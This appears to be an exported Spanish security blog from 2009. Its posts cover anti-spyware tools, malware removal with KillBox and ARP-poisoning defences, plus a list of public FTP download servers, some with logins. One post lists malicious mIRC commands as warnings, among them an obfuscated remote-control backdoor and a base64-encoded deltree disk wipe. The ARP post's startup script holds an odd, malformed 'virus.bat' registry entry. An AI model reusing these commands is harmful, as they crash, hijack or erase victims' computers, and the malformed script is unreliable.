telefónicos.<br /><br /> * No ingresar la dirección de correo en sitios de Internet sospechosos.<br /><br /> * Tener cuidado al utilizar programas p2p (peer to peer) porque muy posiblemente le descargarán alguna clase de infección.<br /><br /> * No abrir correos electrónicos que contengan documentos adjuntos de procedencia dudosa.<br /><br /> * No navegar en sitios de descarga de cracks, serial y demás.<br /><br /> * Evitar todo sitio web ilegal de descargas gratuitas y demás.<br /><br /> * No confiar en software gratuito hasta no saber su procedencia real.<br /><br /> * Aceptar transferencias de datos solamente de usuarios conocidos y confiables.<br /><br /><span style="font-size: 13pt; line-height: 1.3em;"><b>eliminación del Spyware</b></span><br /><br />Recomendaciones de programas para combatir los Spyware, pondré una lista de los mas confiables a la hora de combatirlos .<br /><br /><b>SpyRemover 2.6.5</b><br /><a href="http://culturahack.com.ar/Foro/index.php/topic,1447.0.html" target="_blank">http://culturahack.com.ar/Foro/index.php?topic=1447.0</a><br /><br /><b>Ad-Aware</b><br /><a href="http://www.lavasoftusa.com/" target="_blank">www.lavasoftusa.com</a><br /><br /><b>Arovax AntiSpyware free</b><br /><a href="http://culturahack.com.ar/Foro/index.php/topic,776.0.html" target="_blank">http://culturahack.com.ar/Foro/index.php?topic=776.0</a><br /><br />Es recomendable siempre tener un buen antivirus actualizado ,nosotros hemos echo una encuesta en el foro y en base a eso te recomendamos <b>NOD32 </b> O <b>KasperSky</b><br /><br />Una recomendación imprescindible es tener instalado un buen Firewall,te recomendamos el <b>ZoneAlarm PRO</b> es muy sencillo de usar, la versión PRO te da la oportunidad de bloquear Cookies, Adwares, Pop-Ups, Embeded Objects, Mime Objects, Scripts y Java Scripts, Active-X, Vbscripts, además de las funciones básicas de filtración de puertos.<br />Es un software muy completo y muy eficaz que te evitará que muchos de ésos archivos espía se infiltren en tu computadora.<br /><br /><b>ZoneAlarm PRO</b><br /><a href="http://culturahack.com.ar/Foro/index.php/topic,1260.0.html" target="_blank">http://culturahack.com.ar/Foro/index.php?topic=1260.0</a><br /><br />También, hay ocasiones en que los archivos espía no pueden ser detectados por programas como el Ad-aware, y en éstos casos es recomendable un buen programa antitroyano como:<br /><br /><b>The Cleaner</b><br /><a href="http://www.moosoft.com/" target="_blank">www.moosoft.com</a><br /><br />Si después de usar un programa específico para eliminar los archivos espía, sigues teniendo problemas, es bueno usar un programa como éste para detectar "lo indetectable".<br /><br />Y como última recomendación, te doy 2 programas que te permitirán ver los procesos que se ejecutan en tu computadora, y que generalmente se ocultan si tratas de descubrirlos ya sea en modo de consola o de administrador de dispositivos (en sistemas Windows):<br /><br /><b>RootKit Revealer</b><br /><a href="http://www.sysinternals.com/Utilities/RootkitRevealer.html" target="_blank">www.sysinternals.com/Utilities/RootkitRevealer.html</a><br /><br /><b>ProcessExplorer</b><br /><a href="http://www.sysinternals.com/Utilities/ProcessExplorer.html" target="_blank">www.sysinternals.com/Utilities/ProcessExplorer.html</a><br /><br /><br /><b>Definición completa de Rootkit</b><br /><a href="http://www.culturahack.com/Foro/index.php?topic=1083.0" target="_blank">http://www.culturahack.com/Foro/index.php?topic=1083.0</a><br /><br /><br />fuente: culturahackCibercentinelahttp://www.blogger.com/profile/00237087687003170157noreply@blogger.com1tag:blogger.com,1999:blog-6882397234957178715.post-40667153750174139932009-11-23T13:33:00.000+01:002009-11-23T13:37:28.275+01:00Servidores ftp PublicosOs dejo unos servidores ftp, es otra forma de descargarse musica,juegos, ect..............<br /><br />para poder usarlo teneis que descargaros el <a href="http://www.egydown.com/2021-flashfxp.html">flashfxp</a><br />alguna duda dejar en comentario o en el correo.<br /><br /> * http://www.listen77.com/mp3/<br /><br />Servidor FTP de Música, no se ni cuanta música hay:<br /><br /> * ftp://193.43.36.131/Radio/History/<br /> * ftp://193.43.36.131/Radio/MP3/<br /> * ftp://193.43.36.131/Radio/RealAudio/<br /><br /><br />ftp:lucas:123456@lucaseo.ftpserver.nu<br /> 1. ftp://ftp.freenet.de/pub/filepilot/<br /> 2. ftp://207.71.8.54:21/games/<br /> 3. ftp://129.241.210.42/pub/games/<br /> 4. ftp://212.174.160.21/games<br /> 5. ftp://129.241.210.42/pub/games/<br /> 6. ftp://clubmusic:clubmusic@217.172.16.3:8778/<br /> 7. ftp://194.187.207.98/video/<br /> 8. ftp://194.187.207.98/music/<br /> 9. ftp://194.187.207.98/soft/<br /> 10. ftp://ftp.uglan.ck.ua/<br /> 11. ftp://159.153.197.74/pub<br /> 12. ftp://leech:l33ch@61.145.123.141:5632/<br /> 13. ftp://psy:psy@ftp.cybersky.ru<br /> 14. ftp://130.89.175.1/pub/games/<br /> 15. ftp://194.44.214.3/pub/<br /> 16. ftp://195.161.112.15/musik/<br /> 17. ftp://195.131.10.164/software<br /> 18. ftp://195.146.65.20/pub/win/<br /> 19. ftp://212.122.1.85/pub/software/<br /> 20. ftp://193.125.152.110/pub/.1/misc/sounds/mp3/murray/<br /><br /><br />ftp://217.216.192.91 SERVIDOR DE POBAS (PENTIUM 2 A 350).Encontrareis de todo un poco,,,; software, mp3, tutoriales, juegos, flash, videos,,,,<br />ftp.celestial.com Linux<br />ftp.cetis.hvu.nl I.P. de Utrech, Holanda. IRC, Linux, Imágenes, Sim Tel on-line<br />ftp.ceu.fi.udc.es Facultade de Informática - Universidade da Coruña<br />ftp.cica.es Centro Informático Cientifico de Andalucía<br />ftp.cica.indiana.edu CICA archivo Windows 95 y 3.11<br />ftp.cistia.es Universidad de Canarias<br />ftp.clark.net Gráficos, iconos, mirrors, Amiga, Linux,<br />ftp.clark.net Gráficos, iconos, mirrors, Amiga, Linux,<br />ftp.clip.dia.fi.uma.es Departamento de Inteligencia Artificial - Universidad Politécnica de Madrid<br />ftp.coast.net SimTel Archives Quizá la mayor colección para DOS, Win y NT<br />ftp.cs.tu-berlin.de Alemania<br />ftp.cs.ruu.nl Todo lo que quieras en y sobre el formato MIDI<br />ftp.download.com Admite hasta 1000 usuarios simultáneos. Una bestia<br />ftp.demon.co.uk Antivirus para todas las plataformas Mirror de ftp.xfree86.org<br />ftp.dit.upm.es<br /> DIT - Universidad Politécnica de Madrid.<br />ftp.etse.urv.es Escola Tecnica Superior d'Enginyeria - Universitat Rovira i Virgili<br />ftp.etsimo.uniovi.es Escuela de Minas / Servicio de Informática Gráfica - Universidad de Oviedo<br />ftp.fc.udg.es Facultat de Cincies - Universitat de Girona<br />ftp.funet.fi Red Universitaria de Finlandia. Tiene de todo<br />ftp.gaetano.uhu.es D.I.E.S.I.A. Universidad de Huelva.<br />ftp.garbo.uwasa.fi GARBO, en Finlandia.No necesita presentación: DOS, Win, MAC, UNIX<br />ftp.gui.uva.es Universidad de Valladolid. Montañas de cosas (S.Pack 2 NT4)<br />ftp.idg.es Pc Actual. Tiene cosas buenas<br />ftp.iaa.es Instituto de Astrofísica de Andalucía - Consejo Superior de Investigaciones Científicas<br />ftp.iac.es I. Astrofísico de Canarias<br />ftp.ird.ub.es<br /> <br />Universitat de Barcelona<br />ftp://makosteszta.sote.hu En Hungría. Antivirus<br />ftp.pwr.wroc.pl<br /> <br />Polonia<br />ftp.rediris.es Red Académica española. Espejo de Simtel. + de 12 gigas de material<br />ftp.ruuc.net.au<br /> <br />Es lento<br />ftp.simtel.net SIM TEL NET (Walnut Creek). 2000 usuarios simultáneos. La máquina es un P6 a 200MHz con 512MB de memoria y 124GB de disco. Sólo algo más potente que el mío :-((<br />ftp.sura.net Un gran almacen para PC y Unix<br />ftp.switch.ch Red Académica Suiza. Un montón de cosas. Mirror de casi todo<br />ftp.tecmedia.co.cr <br />Costa Rica<br />ftp.tsc.uvigo.es Universidade de Vigo - (Indexado en Archie)<br />ftp.tuke.sk<br /> <br />Eslovaquia<br />ftp.ua.es Centro de Proceso de Datos - Universitat d'Alacant (indexado en archie)<br />ftp.uam.es Universidad Autónoma de Madrid<br />ftp.uco.es <br />ftp.udc.es<br /> <br />Universidad de A Coruña. Serv. Pack 1 Win 95, Clientes Archie.<br />ftp.ulpgc.es<br /> U. Las Palmas de G. Canaria<br />ftp.uma.es Universidad de Málaga - (Indexado en Archie)<br />ftp.uniovi.es Universidad de Oviedo. Muy bueno<br />ftp://cert.unisa.it Italia<br />ftp.unizar.es<br /> <br />ftp.upc.es Serveis Informtics - Universitat Politécnica de Catalunya<br />ftp.usal.es<br /> <br />Universidad de Salamanca<br />ftp.uv.es<br /> <br />Universidad de Valencia<br />ftp.vse.cz Checoslovaquia<br />ftp.vein.hu <br /><br />Hungría. Antivirus<br />ftp.arrakis.es Mirror de Tucows. Sólo admite 6 usuarios "no arrakianos" simultáneos.<br />ftp.cdrom.com <br /> <br />Wallnut Creek CD-ROM "home site"<br />ftp.doc.ic.ac.uk Mirror entre otros de Microsoft. SunSITE Northern Europe. Está en el departamento de computadores del Imperial College, Londres, y corre en un Sun Ultra Enterprise 6000: 6 CPUs, 3 Gig ram, 200 GB disco (Sun Microsystems). 200 usuarios<br />ftp.funet.fi Espejo europeo de Intel<br />ftp.nctuccca.edu.tw CCCA (Taiwan) Espejo de cerca de 100 sitios. + 14Gb capacidad.<br />ftp.oak.oakland.edu Universidad de Oakland. Espejo de Sim Tel<br />ftp.rediris.es Red Académica española. Espejo de Simtel + 12 Gigas<br />ftp.switch.ch Red Académica Suiza. Un montón de cosas. Mirror de casi todo<br />ftp.uni-paderborn.de Univ. of Paderborn (Alemania) : CICA, SimTel, Demos, Linux, OS/2, Amiga<br />ftp.wuarchive.wustl.edu Univ. Washington. SimTel, CICA, Grav. Ultrasound.Cibercentinelahttp://www.blogger.com/profile/00237087687003170157noreply@blogger.com26tag:blogger.com,1999:blog-6882397234957178715.post-35320856100758546362009-11-21T13:21:00.000+01:002009-11-21T13:22:06.374+01:00Diferencia de un XPLOIT y un EXPLOITQue es Exploit y Xploit y diferencias<br /><br />Vamos a ver las definiciones de estos dos terminos que se confunden muy seguido ya que su pronunciacion y escritura son similares.<br />Primero planteo este tema para que dejen de preguntar e insistir con los exploit que en fin lo llaman como al fake mail.<br /><br /><span style="color: pink;">EXPLOIT</span><br />Exploit (viene de to exploit - aprovechar) - código escrito con el fin de aprovechar un error de programación para obtener diversos privilegios. software.<br /><br />Un buen número de exploits tienen su origen en un conjunto de fallos similares. Algunos de los grupos de vulnerabilidades más conocidos son:<br /><br />Vulnerabilidades de desbordamiento de pila o buffer overflow.<br />Vulnerabilidades de condición de carrera (Race condition).<br />Vulnerabilidades de error de formato de cadena (format string bugs).<br />Vulnerabilidades de Cross Site Scripting (XSS).<br />Vulnerabilidades de inyección SQL (SQL injection).<br />Vulnerabilidades de inyeccion de caraceres (CRLF).<br />Obtenido de "<a href="http://es.wikipedia.org/wiki/Exploit" target="_blank">http://es.wikipedia.org/wiki/Exploit</a>"<br /><br /><span style="color: pink;">XPLOIT</span><br />Fake mail o mas comunmente llamado xploit. Enviar correo electrónico falseando el remitente. Se trata de una técnica muy empleada en Ingeniería Social.<br /><br />Como modo de obtener contraseñas de hotmail,yahoo o cualquier tipo de compania para los correos electronicos. Esta tecnica es considerada lammer para la comunidad de hackers o para quienes se interesan verdaderamente en el tema del hacking.<br /><br /><br />fuente: infiernohackerCibercentinelahttp://www.blogger.com/profile/00237087687003170157noreply@blogger.com0tag:blogger.com,1999:blog-6882397234957178715.post-89647509566282319922009-11-19T19:13:00.000+01:002009-11-19T19:17:20.030+01:00CÓMO ELIMINAR ARCHIVOS MALICIOSOS QUE SE RESISTEN, USANDO KILLBOX<p><strong>1.</strong> Hay ocasiones en que después de analizar el PC con el antivirus residente o con algún antivirus on-line se nos indica que ha encontrado algún archivo malicioso y no ha podido eliminarlo.</p> <p><strong>2.</strong> El siguiente paso sería localizar ese archivo. Nos dirigimos a la ruta Completa del archivo que nos ha indicado el antivirus y aquél no aparece.</p> <p><strong>3.</strong> Tendríamos que proceder a activar la opción “Mostrar todos los archivos y carpetas ocultos”:</p><p><strong><br /></strong></p><p><strong>Ver archivos ocultos en Windows XP:</strong><br /><span style="color:red;"><br />- Haz doble-clic en “Mi PC”. – Herramientas/Opciones de carpeta. – Selecciona la pestaña “Ver”. – Desmarcar “Ocultar extensiones de archivo para tipos de archivo conocidos” – En “Archivos ocultos” selecciona “Mostrar todos archivos y carpetas ocultos”. – Aplicar y Aceptar.</span></p><p><br /></p><p><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihGJ7P_NK65etclDTQL8nbQMY5bWV2l6Z8AU3rrwUWh6lgiHC4e7xJLaFk5qaxJhccWgjTbCU2_R7iZ3LCTbk8QI1W350iLSvEShOI8zKY1GrZT5-sTmXOriXsSfydfJcm6_PdBej9G9A/s1600/35069167jc0.jpg"><img style="cursor: pointer; width: 278px; height: 284px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihGJ7P_NK65etclDTQL8nbQMY5bWV2l6Z8AU3rrwUWh6lgiHC4e7xJLaFk5qaxJhccWgjTbCU2_R7iZ3LCTbk8QI1W350iLSvEShOI8zKY1GrZT5-sTmXOriXsSfydfJcm6_PdBej9G9A/s320/35069167jc0.jpg" alt="" id="BLOGGER_PHOTO_ID_5405879838014968178" border="0" /></a></p><p><strong>4.</strong> Una vez realizado este paso, buscamos el archivo malicioso y lo eliminamos.</p> <p><span style="color:red;">*Si el archivo no se dejase eliminar, debes reiniciar el PC en “modo seguro” (a<br />prueba de errores) para intentar eliminarlo.<br />*Si el archivo malicioso tampoco aparece después de haber activado la opción<br />“Mostrar todos los archivos y carpetas ocultos”, debemos usar el programa<br />KillBox para “sacar a flote” ese archivo.</span></p> <p><strong>5.</strong> Descarga el programa <a rel="nofollow" target="_blank" href="http://www.downloads.subratam.org/KillBox.exe"><strong><em><u>KillBox</u></em></strong></a></p> <p>Ejecuta KillBox y selecciona<strong> “Delete on reboot”:</strong></p><p><br /><strong></strong></p><p><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiH0Vst5NWt-XFSU1An08TP8oRVyhK-lOkoofGIMnTWaV801rvL4i_IlJvfh7LSYcVM0YsoxX-_C8jPjpfrfj2g7F0I5hX_bVLjo_IiGrRFt7NDMHSrhOmfWY5WdlWZOOFsGYx8Kqo94Vw/s1600/35069167jc0.jpg"><img style="cursor: pointer; width: 315px; height: 278px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiH0Vst5NWt-XFSU1An08TP8oRVyhK-lOkoofGIMnTWaV801rvL4i_IlJvfh7LSYcVM0YsoxX-_C8jPjpfrfj2g7F0I5hX_bVLjo_IiGrRFt7NDMHSrhOmfWY5WdlWZOOFsGYx8Kqo94Vw/s320/35069167jc0.jpg" alt="" id="BLOGGER_PHOTO_ID_5405880092662650386" border="0" /></a></p><p>-En el recuadro que dice <strong>“Full path of file to delete”</strong>, teclea la ruta completa<br />del archivo que deseas eliminar:</p> <p class="bbimg"><img style="width: 344px; height: 301px;" src="http://img45.imageshack.us/img45/7797/3xa3.jpg" alt="imagen externa" border="0" /></p> <p><span style="color: red;">Ej: Si queremos eliminar MSAOL32dll.exe, teclea la ruta donde se encuentra el<br />archivo C:\WINDOWS\System32\MSAOL32dll.exe<br />- Después de colocar la ruta del archivo, haz clic sobre el circulo rojo con un<br />X blanca.<br />- Cuando pregunte “Reboot now” “Reiniciar ahora”, haz clic en “Sí”.</span></p> <p class="bbimg"><img style="width: 355px; height: 310px;" src="http://img105.imageshack.us/img105/6375/4um0.jpg" alt="imagen externa" border="0" /></p> <strong>-Si no es el único archivo a eliminar, selecciona “NO” (que no reinicie), cuando<br />hayas tecleado la ruta del último archivo que deseas eliminar, haz clic en “Sí”<br />para reiniciar el PC.<br /><br />fuente:lestathijackthis<br /></strong>Cibercentinelahttp://www.blogger.com/profile/00237087687003170157noreply@blogger.com0tag:blogger.com,1999:blog-6882397234957178715.post-68999521502792839942009-11-18T12:42:00.000+01:002009-11-18T14:07:54.260+01:00Como Evitar Ataques de Envenenamiento ARPAqui explicare de que manera nos podemos defender de este tipo de ataque<br /><span style="color:orange;"><span style="line-height: 1.3em;font-size:12pt;" >Conocimiento Previo:</span></span><br /><a href="http://en.wikipedia.org/wiki/Address_Resolution_Protocol" target="_blank">ARP en Wikipedia</a><br /><a href="http://icaix.com/tutoriales/ARP.htm" target="_blank">Video Tutorial de ARP</a><br /><a href="http://foro.portalhacker.net/index.php/topic,70067.0.html" target="_blank">¿Que es un Ataque Envenenamiento ARP?</a><br /><br /><span style="line-height: 1.3em;font-size:12pt;" ><span style="color:orange;">Herramientas:</span></span><br /><a href="http://arpwatch-ng.softonic.com/linux" target="_blank">ARP Watch (linux)</a><br /><a href="http://www.secudos.com/public/AG-240.pdf" target="_blank">ARP guard</a><br /><br /><span style="line-height: 1.3em;font-size:12pt;" ><span style="color:orange;">Video Tutorial:</span></span><br /><a href="http://icaix.com/tutoriales/arpwatch.htm" target="_blank">Defenderse de Ataques de envenenamiento ARP</a><br /><br /><span style="color:orange;"><span style="line-height: 1.3em;font-size:14pt;" ><b>Maneras de defenderse del ataque:</b></span></span><br /><br /><span style="color:orange;"><span style="line-height: 1.3em;font-size:13pt;" ><b>1-ARP Watch (linux)</b></span></span><br />ARP Watch es una herramienta para sistemas linux que nos puede ayudar a detectar el envenenamiento ARP en nuestro sistema operativo.<br />con esta herramienta podemos comprovar la correspondencia entre pares (IP/MAC). en el caso en que se este provocando un ataque ARP Watch manda un correo de notificacion a la cuenta administrador del sistema.<br />Tambien puede detectar nuevos host en la red<br />(si alguien falsifica su IP/MAC para hacer un ataque de envenenamiento ARP)<br /><br /><span style="color:orange;"><span style="line-height: 1.3em;font-size:13pt;" ><b>2-ARP Guard (hardware)</b></span></span><br />ARP guard es un hardware que nos permite reconocer las amenazas<br />de un posible ataque de enevenenamiento ARP.<br />esta constantemente observando los paquetes ARP<br />y si detecta alguna anomalia manda un mensaje a el administrador de la red<br />con el origen del ataque.<br /><br /><span style="color:orange;"><span style="line-height: 1.3em;font-size:15pt;" ><b>3-Asignacion Estatica en la tabla de entradas ARP<br /></b></span></span><br />El ataque de envenenamiento ARP consiste en modificar las entradas en las tablas ARP. el sistema es vulnerable por que puede moverse. entonces sencillamente dejemoslo fijo y que nadie lo pueda mover =D<br /><br />Bien esto es un poco mas complicado, asi que pongan atencion.<br />existen dos maneras de añadir una entrada a una tabla ARP.<br /><br /><span style="line-height: 1.3em;font-size:12pt;" ><span style="color:orange;">1º Forma Automatica</span></span><br />Es lo que hace nuestro PC todo el tiempo sin que nos demos cuenta<br /><br /><span style="line-height: 1.3em;font-size:12pt;" ><span style="color:orange;">2º Forma Manual</span></span><br />De la manera manual nosotros podemos dejar inmutable incluso apagado el sistema de dicha entrada en la tabla ARP.<br /><br />Para añadir una ARP en un sistema esta es la Sintaxis:<br /><img style="width: 425px; height: 81px;" src="http://img169.imageshack.us/img169/2350/arpstf7.png" alt="" border="0" /><br /><b>[Direccion IP]</b> --> Direccion IP del Host<br /><b>[Direccion MAC]</b> --> Direccion MAC del Host<br /><br />De esta manera las Direcciones MAC quedan Grabadas.<br />y por mucho que el PC atacante intente hacer un ataque envenenamiento ARP No lo podria haber logrado =D<br />Y si ubiesemos tenido el sofware ARP Watch (en linux)<br />podriamos haber sabido quien fue el que intento hacer el ataque.<br /><br />Eso si esto tiene Una Falla, al apagar el PC las tablas ARP se encontraran vacias al volver a prender el PC, y eso nos vuelve vulnerables al ataque.<br />pero sencillamente debemos de crear un .bat que haga que se inicie con windows siempre y nunca mas nos preocuparemos de estos ataques ^^<br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;">@echo off<br />arp -s [Direccion IP del Host] [Direccion MAC del Host]<br />reg add hkey_local_machine\software\microsoft\windows\currentversion\run/v virus.bat/t reg_sz /d C:\windows\system32 /f<br />exit</pre></div><br />Saludos! y espero que les guste<br /><br />fuent: foro.infiernohacker.comCibercentinelahttp://www.blogger.com/profile/00237087687003170157noreply@blogger.com0tag:blogger.com,1999:blog-6882397234957178715.post-22571706501321535362009-11-13T19:38:00.000+01:002009-11-13T19:46:22.587+01:00COMANDOS PELIGROSOS:Este post va dedicado a los irc (chat)<br /><br /><br />Los podemos dividir en 2 categorías: Comandos que escribe el atacante y comandos que escribe la víctima. Contra los primeros sólo podemos protegernos manteniendo actualizado nuestro sistema. Contra los segundos, lo tenemos mucho más sencillo: No escribir jamás ningún comando cuya acción desconozcamos.<br /><br />a) Comandos que escribe el atacante:<br /><br />**** Con/Con **** -= Pantallazo Azul =-<br /><br />- Este comando aprovecha un fallo del kernel de windows, el cual, produce el comúnmente conocido como " Pantallazo Azul " y nos hace reiniciar el ordenador, o meterle tres patadas ( sobre gustos no hay nada escrito ).<br />- Este es el comando para un canal entero:<br /><br />/ctcp #canal sound \IFS$HLP$\IFS$HLP$\IFS$HLP$.mp3<br /><br />- Este es para una sola persona:<br /><br />/ctcp #canal nick sound \IFS$HLP$\IFS$HLP$\IFS$HLP$.mp3<br /><br />-¿Cómo evitarlo?<br /><br />-Si usamos ircap podemos bajarnos también el parche contra el con/con de la página:<br /><br />http://www.ircap.net<br /><br /><br />**** Sacar IP's **** -= !seen nick =-<br /><br />-Da pocos resultados, pero a veces funciona y da la ip o dns del nick víctima.<br />-¿Cómo evitarlo?<br />Desactivando en nuestro script el comando !seen. Para ello escribimos:<br />/disable #seen<br /><br />b) Comandos que escribe la víctima:<br /><br />**** Timer **** -= Soy gay! =-<br /><br />-Comando poco peligroso, pero sí molesto y pesado. Aparte de ponernos en ridículo, nos puede hacer desconectarnos del irc por excess flood.<br /><br />- Lo que hace al ejecutarse es activar un timer o temporizador que repite en bucle (siempre lo mismo). El más típico es tunick soy gay, (aunque el texto puede ser cualquiera) en todos los canales en los que estes.<br /><br />-Algunas de las variantes de éste comando son las siguientes:<br /><br />//t $+ $chr(105) $+ $chr(109) $+ er 0 1 $chr(97) $+ $chr(109) $+ S $+ $chr(103) $chr(115)) $+ o $+ $chr(121) $chr(103) $+ $chr(97) $+ $chr(121)<br /><br />/timer 0 1 //$left(ameipmask,3) $left(esirc,2) $left(Generated,1) $+ $right(getipay,2)<br /><br /><br />-Resultado del comando:<br /><br /><tunick> soy gay<br /><tunick> soy gay<br /><tunick> soy gay<br /><tunick> soy gay<br /><tunick> soy gay<br /><tunick> soy gay<br /><tunick> soy gay<br /><tunick> soy gay<br /><tunick> soy gay<br /><tunick> soy gay<br /><tunick> soy gay<br /><tunick> soy gay<br /><br />(Así hasta que te caes por excess flood).<br /><br />-¿Cómo evitarlo?<br /><br />-La mejor forma es evidente, no escribiendo comandos cuya acción desconozcamos.<br /><br />-Si ya lo hemos escrito, tenemos que fijarnos en lo que pone al ejecutar la sentencia:<br /><br />Si pone: * Timer loquesea activated<br /><br />Tenemos que escribir: /timerloquesea off (timerloquesea todo junto).<br /><br />Por ejemplo, Si pone * Timer 1 activated<br /><br />Tenemos que escribir: /timer1 off<br /><br />-Si no nos da tiempo a pararlo, sólo hay que cerrar el script, y luego volverlo a abrir, entrar a los canales en los que estabamos y explicar quee tu hermano pequeño o amigo te pilló el teclado y lo puso (casi nuca te creerán :DDDD )<br /><br />**** _antispam **** -= Ataca _antispam !! =-<br /><br />- Este comando hace enfadar mucho al bot que se encarga de la publicidad no permitida en las redes llamado _antispam.<br /><br />-Su modus operandi es muy simple, al poner el comando en pleno canal, donde se encuentre el bot, todos esos caracteres se decodifican (traducen al cristiano) y forman la frase: www.sexoduro.com, con lo cual el bot te engancha y te pone un g-line, sin que puedas volver a conectarte a esa red en un buen ratito.<br /><br />//$decode(bXNnIF9hbnRpc3BhbSB3d3cuc2V4b2R1cm8uY29t,m)<br /><br />- Existen más variaciones de éste código, que nos hacen decir: www.jodiendo.com , www.sexogratis.com, etc... no os fieis y pongais cosas que no sabeis para que son; os pueden estar tomando el pelo.<br /><br />**** Ctcp's **** -= Remote Control =-<br /><br />- Este comando es igual que un troyano, pero en version IRC. Permite a cualquiera manejarte a voluntad como si fueras un bot, pudiendo hablar por ti, enviar dccs, banear o dar @ a alguien, etc...<br /><br />- El modo de infeccion es el mismo que los anteriores. Te llega un individuo y te camela para que pongas el comando con fines diversos como veremos a continuación.<br /><br />- El principio del comando es el señuelo o engaño, puesto que puede ser muy distinto, según nos digan que lo pongamos para obtener @ en todos los canales, para que no nos puedan banear, etc, etc.<br /><br />- //echo -a opme #canal tunick <--- esto es el principio del comando que como vereis se puede cambiar para persuadiros de que lo pongais, diciendo, en este caso que obtendreis @ en un determinado canal . Si lo poneis vereis quee solo decis: opme #canal tunick ,donde #canal puede ser ummmm #Malaga y tunick pepe. Seria asi el comienzo del comando ---> opme #Malaga pepe ..............<br /><br />-Este es el comando completo (ya hemos dicho que el comienzo puede variar).<br /><br />//echo -a opme #canal nick | $mid(au-writer,4,5) $mid(badabc,3,3) $+ $chr(46) $+ $mid(allintxt,6,3) $mid(CTC-org,1,3) $+ $chr(80) $str(*:,3) $chr(36) $+ $mid(1-2=3,1,2) $chr(124) $mid(scotty-haltty,8,4) | $chr(46) $+ $mid(loader-client,1,4) $mid(q-rstu,2,3) $mid(badabc,3,3) $+ $chr(46) $+ $mid(alltxt,4,3)<br /><br />- Como podeis observar es extremadamente largo, pero se ha abreviado y reducido a multitud de tamaños.<br /><br />- ¿Como se controla a un infectado ?<br /><br />-Mediante ctcp's: /ctcp nickvictima //msg #canal mensaje<br /><br />Traducción: /ctcp pepe //msg #malaga eres mi esclavo :DDDD<br /><br />La opcion msg se puede cambiar por deop nickx (quita la @ al nickx), op nickx (da @ al nickx) etc...<br /><br />- ¿Como saber quien me controla ?<br /><br />-Fácil, nos vamos a estado y miramos los ctcps puesto que te controlan mediante ellos.<br /><br />Veriamos: Ctcp nickmalvado y la orden que nos ha enviado hacer.<br /><br />-¿Cómo evitarlo?<br /><br />- Si “por casualidad” llegaseis a poner ese comando, el modo de desinfección es fácil. Al poner el comando se crea un documento con el nombre dab.txt en la carpeta C:\mIRC (esto varia segun los scripts), en cuyo interior se puede ver algo asi:<br /><br />CTCP *:*:*: $1- | halt<br /><br />-Con borrar ése archivo, cerrar el script y volverlo a abrir estaremos limpios otra vez.<br /><br />//say $ip -= Dime tu ip =-<br /><br />-Escribiendo éste comando<br /><br />//say $ip<br /><br />Darás tu ip a todo el canal donde lo escribas<br /><br /><br />**** Deltree **** -= Formateo de disco =-<br /><br />-ATENCIÓN: MUY PELIGROSO<br /><br />- Este comando funciona en windows 95 y 98. Al introducirlo hace una ejecución de ciertos archivos del sistema que originan algo similar a un format c: (nos borra el disco duro!!!).<br /><br />//$decode(L3J1biAtbiBcd2lvZG93c1xjb21tYW5kXGR1bHRyZXhlIC95IGM6XC4gPm51bA==,m)<br /><br />-¿Cómo evitarlo?<br /><br />Una vez más NO ESCRIBIENDO JAMÁS NINGÚN COMANDO QUE NO CONOZCAMOS<br /><br /><br />**** F4 **** -= ¡Que me caigo! =-<br /><br />-No se trata propiamente de un comando, pero es una de las “novatadas” más extendidas en los canales de irc con los usuarios inexpertos. Consiste en convencer a la víctima (diciéndole que conseguirá @ por ejemplo), de que pulse la tecla de función F4, lo que provoca su desconexión del irc.<br /><br />NOTA: TODOS LOS COMANDOS AQUI PRESENTES HAN SIDO PROBADOS EN EL SCRIPT IRCAP<br /><br />LAS VERSIONES ACTUALIZADAS AVISAN DE QUE LO QUE ESTAS PONIENDO ES POSIBLE QUE SEA UN COMANDO MALIGNO<br /><br />PARA EL MIRC 6.01 NO FUNCIONA NINGUN COMANDO, SOLO SI VA ACOMPAÑADO DEL IRCAP Y COMO DIJE ANTES, AVISA DE ELLO SI ES UNA VERSION ACTUAL.<br /><br />LA MAYORIA DE COMANDOS NO FUNCIONAN EN LOS SCRIPTS ACTUALES ( ES IMPORTANTE ESTAR ACTUALIZADO )<br /><br />COMO PUEDEN AVERIGUAR NUESTRA IP<br /><br />-Debido a la implantación de las ip virtuales, resulta completamente imposible que puedan sacar nuestra ip mediante los métodos convencionales de los scripts. Pero debemos recordar que tanto los envíos de archivos, como aceptar archivos que nos envíen a nosotros mediante DCC, así como el DCC chat mostrarán nuestra ip a la persona que ha conectado con nosotros.<br /><br />-Si somos nosotros los que enviamos algo por DCC o ponemos el DCC chat, el envio junto con nuestra ip se reflejarán en la ventana estado.<br /><br />-Si nos mandan algo por DCC o aceptamos un DCC chat de alguien, ese alguien puede ver nuestra ip simplemente haciendo un netstat.<br /><br />-Si nos mandan visitar una página web que se encuentre en un servidor en un equipo “casero”, pueden loguear nuestra ip. Lo mismo sucederá si entramos en servidores de irc que sean inseguros o que no posean servicio de protección de ips (ips virtuales). Algunos de éstos servidores resultan, además, altamente peligrosos, pues pueden, incluso, obligarnos a visitar páginas web no deseadas que pueden tener contenidos peligrosos e, incluso, virus y troyanos (el navegador, en éste caso, se nos abre solo y va a la página que el administrador del servidor desee!!!)<br /><br />-Utilizando el comando “!seen” anteriormente visto.<br /><br />-Pidiéndonos que escribamos el comando //say $ip también visto anteriormente, o alguna de sus variantes.<br /><br /><br />-¿Cómo evitarlo?<br /><br />-No enviando ni aceptando archivos por DCC ni DCC chat de nicks que no conozcamos, y que no sean de nuestra absoluta confianza, y, aún en ése caso, asegurarnos bien que ése nick es la persona que nosotros creemos y no algún lamer que se ha puesto el nick de nuestro amigo. Para ello utilizaremos el comando:<br /><br />/msg nick status nick_de_nuestro_amigo<br /><br />Sólo si nos responde<br /><br /><nick> STATUS nick_de_nuestro_amigo 3 (Identificado)<br /><br />podremos estar seguros de que efectivamente ésa persona es quien nosotros creemos.<br /><br />-No visitar páginas. web de personas q no sean de confianza (si estas páginas están en servidores propios), porque cuando accedes al server se loguea tu ip.<br /><br />-No entrando en servidores de irc inseguros, que no tengan servicio de ips virtuales, servidores de 